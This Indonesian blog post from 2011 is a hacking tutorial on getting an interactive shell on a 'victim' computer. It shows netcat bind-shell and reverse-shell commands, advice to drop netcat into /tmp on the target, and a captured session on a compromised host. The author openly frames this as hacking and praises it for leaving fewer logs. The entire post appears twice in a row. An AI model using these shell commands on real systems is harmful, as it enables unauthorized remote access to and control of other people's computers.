
Selasa, 01 Maret 2011
di
06.13
|
0
komentar
Apa itu remote connection?
Dalam judul aku menuliskan “Interactive Console” dalam tanda kurung. Iya, memang ini yang aq maksud. Remote connection adalah koneksi jarak jauh ke suatu host/komputer dengan mendapatkan sebuah console interaktif dari komputer yang kita remote melalui port tertentu yang telah dibuka. Jadi seakan-akan kita berada langsung di depan komputer yang kita remote dan kita membuka aplikasi console. Namun dalam hal ini, kita berada di jarak jauh dan menggunakan komputer kita,sedangkan console yang kita dapatkan, terkoneksi secara langsung ke komputer sasaran, sehingga command-command yg kita ketik-kan di kirim langsung ke komputer sasaran, inilah interactive console.
Get Console !!
Mendapatkan interaktif console sangat penting dalam melakukan hacking. Selain kecepatan danketepatan, kita juga lebih leluasa mengirimkan perintah ke komputer sasaran, lebih leluasa, lebih bebas, dan sedikit log. Dengan interaktif console, kita bisa meloncat ke session lain dalam komputer yang sama, misal untuk login ke mysql server, root exploit, dll.
Banyak cara, teknik, metode, jurus, trik, maupun strategi untuk mendapatkan console jarak jauh. Mulai dari melalui webshell, RCE, LFI, RFI, atau dengan mengirim ninja ke komputer sasaran untuk membantu kita melakukan remote connection.
Ada 2 cara yang bisa kita lakukan untuk mendapatkan console interaktif ini. Yaitu bindshell, dan backconnect.
BindShell
Bindshell adalah membuka port (binding) pada komputer korban
dengan mengikutkan service/aplikasi yang akan melayani koneksi yang di terima dari port yg di buka. Umumnya aplikasi yang di pakai adalah /bin/bash. Sehingga ketika terjadi koneksi ke port yg di buka, maka komputer korban akan menjalankan aplikasi /bin/bash dan meluncurkannya kepada attacker. Disebut bindshell karena bind di
lakukan dengan memberikan service shell (/bin/bash). Dengan demikian, attacker yg melakukan koneksi ke port yg di bind tersebut, akan mendapatkan /bin/bash dari komputer korban. It is a interactive console.
# BindShell dengan NetCat
Dengan netcat, kita bisa membuka port dengan membuat listening port di komputer korban. Attribut –l di sertakan pada command netcat untuk membuat listening port.
nc –v –l –p [port] –e [service/aplikasi]
contoh : ./nc –v –l –p 4444 –e /bin/bash &
-v : volume. Menunjukkan volume server ketika terjadi koneksi.
-l : listening mode (menunggu koneksi)
-p : open port
-e : set service/aplication
Setelah shell berhasil opening port (listening port) kita tembak dr PC kita dengan cara
nc –vv [ip shell] [port]
BackConnect
Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita. Kalau tadi bindshell adalah remote dari komputer kita ke komputer sasaran, kalau backconnect di balik, dari komputer sasaran ke komputer kita. Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena gak punya akses, denied akses, sekurity dari firewall, atau karena komputer sasaran tertutup oleh proxy server (komputer sasaran berada di dalam network yang tertutup oleh proxy). Bila ada proxy di depan komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa melakukan remote konek ke sasaran karena tertutup komputer proxy.
Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.
# Backconnnect dengan Netcat
Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.. Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.
[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp. Command untuk backconnect adalah:
nc –vv [ip attacker] [port] –e [launch aplication]
contoh : ./nc –vv 192.168.10.20 6888 –e /bin/bash
Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.
[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86 _64 x86_64 GNU/Linux
* tulisan yg d bold nerupakan perintah yg kita ketikkan.
credits: Gameover 'n Array
Dalam judul aku menuliskan “Interactive Console” dalam tanda kurung. Iya, memang ini yang aq maksud. Remote connection adalah koneksi jarak jauh ke suatu host/komputer dengan mendapatkan sebuah console interaktif dari komputer yang kita remote melalui port tertentu yang telah dibuka. Jadi seakan-akan kita berada langsung di depan komputer yang kita remote dan kita membuka aplikasi console. Namun dalam hal ini, kita berada di jarak jauh dan menggunakan komputer kita,sedangkan console yang kita dapatkan, terkoneksi secara langsung ke komputer sasaran, sehingga command-command yg kita ketik-kan di kirim langsung ke komputer sasaran, inilah interactive console.
Get Console !!
Mendapatkan interaktif console sangat penting dalam melakukan hacking. Selain kecepatan danketepatan, kita juga lebih leluasa mengirimkan perintah ke komputer sasaran, lebih leluasa, lebih bebas, dan sedikit log. Dengan interaktif console, kita bisa meloncat ke session lain dalam komputer yang sama, misal untuk login ke mysql server, root exploit, dll.
Banyak cara, teknik, metode, jurus, trik, maupun strategi untuk mendapatkan console jarak jauh. Mulai dari melalui webshell, RCE, LFI, RFI, atau dengan mengirim ninja ke komputer sasaran untuk membantu kita melakukan remote connection.
Ada 2 cara yang bisa kita lakukan untuk mendapatkan console interaktif ini. Yaitu bindshell, dan backconnect.
BindShell
Bindshell adalah membuka port (binding) pada komputer korban
dengan mengikutkan service/aplikasi yang akan melayani koneksi yang di terima dari port yg di buka. Umumnya aplikasi yang di pakai adalah /bin/bash. Sehingga ketika terjadi koneksi ke port yg di buka, maka komputer korban akan menjalankan aplikasi /bin/bash dan meluncurkannya kepada attacker. Disebut bindshell karena bind di
lakukan dengan memberikan service shell (/bin/bash). Dengan demikian, attacker yg melakukan koneksi ke port yg di bind tersebut, akan mendapatkan /bin/bash dari komputer korban. It is a interactive console.
# BindShell dengan NetCat
Dengan netcat, kita bisa membuka port dengan membuat listening port di komputer korban. Attribut –l di sertakan pada command netcat untuk membuat listening port.
nc –v –l –p [port] –e [service/aplikasi]
contoh : ./nc –v –l –p 4444 –e /bin/bash &
-v : volume. Menunjukkan volume server ketika terjadi koneksi.
-l : listening mode (menunggu koneksi)
-p : open port
-e : set service/aplication
Setelah shell berhasil opening port (listening port) kita tembak dr PC kita dengan cara
nc –vv [ip shell] [port]
BackConnect
Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita. Kalau tadi bindshell adalah remote dari komputer kita ke komputer sasaran, kalau backconnect di balik, dari komputer sasaran ke komputer kita. Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena gak punya akses, denied akses, sekurity dari firewall, atau karena komputer sasaran tertutup oleh proxy server (komputer sasaran berada di dalam network yang tertutup oleh proxy). Bila ada proxy di depan komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa melakukan remote konek ke sasaran karena tertutup komputer proxy.
Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.
# Backconnnect dengan Netcat
Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.. Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.
[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp. Command untuk backconnect adalah:
nc –vv [ip attacker] [port] –e [launch aplication]
contoh : ./nc –vv 192.168.10.20 6888 –e /bin/bash
Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.
[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86 _64 x86_64 GNU/Linux
* tulisan yg d bold nerupakan perintah yg kita ketikkan.
credits: Gameover 'n Array
Diposting oleh
*
Label:
hacking,
internet,
networking,
tutorial